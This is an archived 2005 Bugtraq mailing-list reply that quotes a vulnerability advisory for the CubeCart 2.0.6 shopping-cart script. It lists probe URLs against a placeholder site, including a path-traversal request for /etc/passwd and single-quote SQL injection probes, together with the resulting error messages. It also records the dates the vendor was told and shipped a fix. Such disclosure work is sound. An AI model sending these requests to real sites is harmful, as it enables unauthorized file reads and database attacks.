| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050406192255.17157.qmail@mail.securityfocus.com> Date: Thu, 7 Apr 2005 01:13:36 +0530 From: "Ravish Ahuja" <ravish@...next.com> To: "'John Cobb'" <johnc@...ytes.com>, <bugtraq@...urityfocus.com> Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hello, http://www.victimsite.com/index.php?&language=f00bar.php Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php on line 147 This is path disclosure but it can also be used for malicious file include. http://www.victimsite.com/index.php?language=../../../../../etc/passwd Regards, Ravish http://www.xeonext.com -----Original Message----- From: John Cobb [mailto:johnc@...ytes.com] Sent: Sunday, February 06, 2005 11:09 PM To: bugtraq@...urityfocus.com Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hello All, I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6. Authors Site: http://www.cubecart.com CubeCart is described by its authors as: 'What is CubeCart? CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you have hosting supporting PHP and one MySQL database.' +-[Examples:]--------------------------------------------------+ [1]------------------------------------------------------------+ http://www.victimsite.com/index.php?&language=f00bar.php Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php on line 147 [2]------------------------------------------------------------+ http://www.victimsite.com/index.php?&PHPSESSID=' Warning: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0 [3]------------------------------------------------------------+ http://www.victimsite.com/tellafriend.php?&product=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/tellafriend.php on line 46 [4]------------------------------------------------------------+ http://www.victimsite.com/view_cart.php?add=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/view_cart.php on line 49 [5]------------------------------------------------------------+ http://www.victimsite.com/view_product.php?product=' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 53 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 63 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 144 +-[Notes:]-----------------------------------------------------+ Vulnerabilities found on: 05/03/2005 Author(s) Informed on: 05/03/2005 Author(s) Response: 05/03/2005 Author(s) Fix: 05/04/2005 Regards John Cobb JohnC@...ytes.com http://www.NoBytes.com
Powered by blists - more mailing lists